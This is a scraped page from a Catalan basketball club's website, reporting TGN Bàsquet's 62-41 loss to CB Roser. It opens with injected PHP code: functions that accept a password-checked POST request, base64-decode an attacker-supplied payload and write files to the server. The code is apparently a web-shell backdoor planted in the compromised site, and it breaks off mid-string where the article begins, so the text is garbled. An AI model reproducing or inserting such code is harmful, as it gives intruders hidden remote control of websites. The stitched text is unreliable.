function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet, condicionat per les baixes, cau a la pista del CB Roser (62-41) - Tgn Bàsquet Club -

El TGN Bàsquet, condicionat per les baixes, cau a la pista del CB Roser (62-41)

Updated: febrer 16, 2022

El Sénior Copa del TGN Bàsquet va fer un partit molt treballat, però va caure contra un intens CB Roser que va dominar el joc durant quasi tot el partit. Les liles sabien que seria un partit complicat, no només per la dificultat del rival i la pista, sinó perquè tenien baixes per covid. El partit va iniciar molt igualat. Les liles van aguantar molt bé defensivament i van anar de mica en mica anotant. Al segon quart les barcelonines van apretar molt més en defensa, provocant moltes pèrdues de pilota que van acabar en contraatacs fàcils. Així van agafar distància en el marcador, entrant a la mitja part 39-25. El tercer període va tornar a ser igualat (11-10), amb una clara voluntat de les jugadores del TGN de capgirar el marcador i de lluitar per remuntar els 15 punts que les separaven del CB Roser. A l’últim temps les tarragonines aconseguien aturar les roges fins al minut 6, quan arriben a estar 10 punts per sota. Però una ratxa d’encert de les locals amplia i molt la diferència de punts, deixant un resultat final, que segons l’entrenador Víctor Neila “no reflecteix el treball i l’esforç de les jugadores durant tot el partit”. Al final del matx es va notar el cansament de les visitants, per culpa de les poques rotacions que tenien, i les rivals ho van saber aprofitar.

Ara mateix el conjunt lila es troba en la quarta posició de la classificació, per sobre del Draft Gramanet, amb set victòries i set derrotes.